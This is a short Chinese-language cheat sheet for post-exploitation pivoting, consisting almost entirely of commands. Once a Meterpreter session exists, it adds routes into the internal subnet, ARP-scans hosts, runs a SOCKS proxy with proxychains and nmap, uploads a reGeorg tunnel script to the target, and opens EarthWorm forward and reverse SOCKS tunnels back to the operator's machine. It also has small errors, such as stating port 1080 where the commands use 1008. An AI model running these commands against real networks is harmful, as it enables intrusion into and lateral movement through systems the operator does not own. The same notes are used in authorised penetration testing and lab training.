1.msf
拿到一个meterpreter会话后,msf可以很方便的通过添加路由的方式使msf可以攻击内网
meterpreter>run get_local_subnets //获取子网/子网掩码
添加路由
meterpreter>run autoroute -s 子网/子网掩码
或
msf>route add 子网 子网掩码 seesion_id
内网主机存活扫描
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
使nmap等工具也可以扫描内网
1.scoks4代理(支持tcp,sock5支持tcp/udp)
use auxiliary/server/socks4a
2.proxychains/proxifier等全局代理软件
proxychains4 nmap -sT ip
2.proxychains/proxifier+reGeorg
1.上传tunnel脚本到靶机
2.python reGeorgSocksProxy.py -u http://ip/tunnel //开启socks服务
3.配置proxychains/proxifier使用socks服务
3.Earthworm(socks5代理)
1.正向,在靶机开启socks服务
ew –s ssocksd –l 888
2.反向
本机添加一个转接隧道,把1080端口收到的代理请求转交给888端口
ew -s rcsocks -l 1008 -e 888
在靶机上开启socks服务,并反弹到本机888端口上
ew -s rssocks -d 本机ip -e 888
接下来就可以配置全局代理软件访问本机1008端口使用靶机socks服务了